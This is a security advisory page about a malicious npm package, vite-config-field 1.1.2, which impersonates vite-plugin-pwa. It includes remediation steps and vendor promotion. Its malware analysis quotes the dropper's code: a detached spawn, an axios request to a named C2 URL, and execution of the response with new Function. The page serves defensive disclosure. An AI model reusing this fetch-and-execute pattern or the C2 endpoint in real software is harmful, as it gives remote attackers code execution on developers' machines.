Which versions of vite-config-field are malicious?

The following npm versions of vite-config-field are flagged malicious: 1.1.2. Treat any of these as compromised.

How do I remediate vite-config-field if I installed it?

Remove vite-config-field from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is vite-config-field part of a known attack campaign?

Yes — vite-config-field is associated with the IN-MAL-2026-006846 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect vite-config-field in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking vite-config-field and packages like it before any post-install script runs.

Malicious package

vite-config-fieldnpm

Malicious code in vite-config-field (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5936

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall vite-config-field

What this malware does

Package impersonates the legitimate vite-plugin-pwa (cloned description 'Zero-config PWA for Vite', repository vite-pwa/vite-config-field, funding link to github.com/sponsors/antfu, and exports matching the upstream API including VitePWA, cachePreset, and configField). When a consumer adds the plugin to their Vite config and the exported configField() runs, it invokes getUseropt() which calls child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' }) and unrefs the child. The spawned dist/client/dev/reactopt.js performs axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } }), takes response.data.Cookie, and executes it with new Function('require', s)(require) — arbitrary remote code execution with full require capability, retrying 5 times. The C2 URL is disguised inside a fake process.env object (DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) to masquerade as environment-variable reads, and console output is silenced around the eval. The detached, stdio-ignored child means the dropper survives independent of the parent build/dev process.

Malicious versions

1 flagged

1.1.2

Indicators of compromise (SHA-256)

d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f

Frequently asked questions

No. vite-config-field on npm has been identified as a malicious package (version 1.1.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006846

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection